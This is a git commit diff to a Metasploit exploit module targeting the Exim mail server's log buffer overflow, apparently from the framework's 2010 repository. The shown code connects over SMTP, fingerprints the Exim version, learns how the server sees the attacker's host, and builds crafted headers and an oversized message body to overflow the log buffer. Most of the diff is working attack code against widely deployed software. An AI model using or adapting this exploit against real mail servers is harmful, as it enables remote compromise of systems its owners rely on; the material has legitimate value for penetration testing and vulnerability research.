Automagic updates to jduck's exim module

git-svn-id: file:///home/svn/framework3/trunk@11277 4d416f70-5f16-0410-b530-b9f4589650da
unstable
HD Moore 2010-12-10 22:16:34 +00:00
parent d5fc9df054
commit a683f7b7d4
1 changed files with 76 additions and 25 deletions


@ -83,22 +83,77 @@ class Metasploit3 < Msf::Exploit::Remote
# Originally discovered/reported Dec 2 2008
'DisclosureDate' => 'Dec 7 2010', # as an actual security bug
'DefaultTarget' => 0))
register_advanced_options([
OptString.new("SourceAddress", [false, "The IP or hostname of this system as the target will resolve it"])
], self.class)
end
def exploit
from = datastore['MAILFROM']
to = datastore['MAILTO']
helo_host = "X" # From the mixin
#
# Connect and grab the banner
#
ehlo = Rex::Text.rand_text_alphanumeric(8)
connect
print_status("Server: #{self.banner.strip}")
ehlo_resp = raw_send_recv("EHLO #{ehlo}\r\n")
if self.banner =~ /Exim (4\.[789]\d)/
print_error("Warning: Exim version #{$1} is not exploitable")
end
if self.banner !~ /Exim/i
print_error("Warning: Could not detect an Exim target")
end
ehlo_resp.each_line do |line|
print_status("EHLO: #{line.strip}")
end
#
# Determine the maximum message size
#
max_msg = 52428800
msg_len = max_msg + 1000 # just for good measure
if ehlo_resp.to_s =~ /250-SIZE (\d+)/
max_msg = $1.to_i
end
#
# Determine what hostname the server sees
#
saddr = nil
if ehlo_resp =~ /^250.*Hello ([^\s]+) \[([^\]]+)\]/
ehlo = $1
saddr = $2
end
from = datastore['MAILFROM']
to = datastore['MAILTO']
resp = raw_send_recv("MAIL FROM: #{from}\r\n")
print_status("MAIL: #{resp.strip}")
resp = raw_send_recv("RCPT TO: #{to}\r\n")
print_status("RCPT: #{resp.strip}")
resp = raw_send_recv("DATA\r\n")
print_status("DATA: #{resp.strip}")
#
# Calculate the headers
#
msg_len = max_msg + (1024*256) # just for good measure
log_buffer_size = 8192
ip = Rex::Socket.source_address('1.2.3.4')
source = saddr || datastore["SourceAddress"] || Rex::Socket.source_address('1.2.3.4')
print_status("Determined our hostname is #{ehlo} and IP address is #{source}")
# The initial headers will fill up the 'log_buffer' variable in 'log_write' function
print_status("Constructing initial headers ...")
log_buffer = "YYYY-MM-DD HH:MM:SS XXXXXX-YYYYYY-ZZ rejected from <#{from}> H=(#{helo_host}) [#{ip}]: message too big: read=#{msg_len} max=#{max_msg}\n"
print_status("Constructing initial headers (source #{source})...")
log_buffer = "YYYY-MM-DD HH:MM:SS XXXXXX-YYYYYY-ZZ rejected from <#{from}> H=(#{ehlo}) [#{source}]: message too big: read=#{msg_len} max=#{max_msg}\n"
log_buffer << "Envelope-from: <#{from}>\nEnvelope-to: <#{to}>\n"
# Now, " " + hdrline for each header
@ -135,28 +190,24 @@ class Metasploit3 < Msf::Exploit::Remote
# In order to trigger the overflow, we must get our message rejected.
# To do so, we send a message that is larger than the maximum.
print_status("Constructing body ...")
body = ''
659883.times {
body << ("MAILbomb" * 10) + "\n"
}
fill = (Rex::Text.rand_text_alphanumeric(254) + "\r\n") * 16384
body_len = 53450538 - (53477372-52428800) + 1
while(body.length < msg_len)
body << fill
end
body = body[0, msg_len]
print_status("Combining parts ...")
data = ''
data << hdrs1
data << hdrx
data << "\n"
data << body
print_status("Connecting ...")
connect_login
print_status("Sending data ...")
sock.put data
sock.put hdrs1
sock.put hdrx
sock.put "\n"
sock.put body
print_status("Ending first message.")
buf = raw_send_recv("\n.\n")
buf = raw_send_recv("\r\n.\r\n")
# Should be: ""552 Message size exceeds maximum permitted\r\n"
print_status("Result: #{buf.inspect}") if buf